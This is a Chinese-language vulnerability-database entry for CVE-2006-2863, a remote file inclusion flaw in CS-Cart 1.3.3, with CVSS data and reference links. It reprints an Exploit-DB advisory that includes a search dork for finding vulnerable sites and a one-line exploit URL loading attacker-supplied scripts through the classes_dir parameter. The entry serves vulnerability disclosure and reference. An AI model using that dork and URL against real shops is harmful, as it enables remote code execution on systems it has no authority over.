CVE-2006-2863
CVSS5.1
发布时间 :2006-06-06 16:06:00
修订时间 :2017-10-18 21:29:10
NMCOE    

[原文]PHP remote file inclusion vulnerability in class.cs_phpmailer.php in CS-Cart 1.3.3 allows remote attackers to execute arbitrary PHP code via a URL in the classes_dir parameter.


[CNNVD]CS-Cart Class.cs_phpmailer.PHP 远程文件包含漏洞(CNNVD-200606-138)

        CS-Cart 1.3.3的class.cs_phpmailer.php存在PHP远程文件包含漏洞,远程攻击者可借助classes_dir参数中的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:cs-cart:cs-cart:1.3.0Simbirsk Technologies, Ltd CS-Cart 1.3.0
cpe:/a:cs-cart:cs-cart:1.3.3Simbirsk Technologies, Ltd CS-Cart 1.3.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2863
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2863
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-138
(官方数据源) CNNVD

- 其它链接及资源

http://www.attrition.org/pipermail/vim/2006-June/000824.html
(UNKNOWN)  VIM  20060606 CS-Cart: request for information (fwd)
http://www.securityfocus.com/bid/18263
(UNKNOWN)  BID  18263
http://www.vupen.com/english/advisories/2006/2125
(UNKNOWN)  VUPEN  ADV-2006-2125
https://exchange.xforce.ibmcloud.com/vulnerabilities/26911
(UNKNOWN)  XF  cscart-classesdir-file-include(26911)
https://www.exploit-db.com/exploits/1872
(UNKNOWN)  EXPLOIT-DB  1872

- 漏洞信息

CS-Cart Class.cs_phpmailer.PHP 远程文件包含漏洞
中危 输入验证
2006-06-06 00:00:00 2006-10-30 00:00:00
远程  
        CS-Cart 1.3.3的class.cs_phpmailer.php存在PHP远程文件包含漏洞,远程攻击者可借助classes_dir参数中的URL执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1872)

CS-Cart <= 1.3.3 (classes_dir) Remote File Include Vulnerability (EDBID:1872)
php webapps
2006-06-03 Verified
0 Kacper
N/A [点击下载]
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  CS-Cart 1.3.3 (classes_dir) <= Remote File Include Vulnerability
$$  Script site: http://www.cs-cart.com
$$  Dork: Powered by CS-Cart - Shopping Cart Software
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

Expl:

http://www.site.com/[CS-Cart_path]/classes/phpmailer/class.cs_phpmailer.php?classes_dir=[evil_scripts]

#Pozdro dla wszystkich ;-)

# milw0rm.com [2006-06-03]
		

- 漏洞信息

26018
CS-Cart class.cs_phpmailer.php classes_dir Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-06-03 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站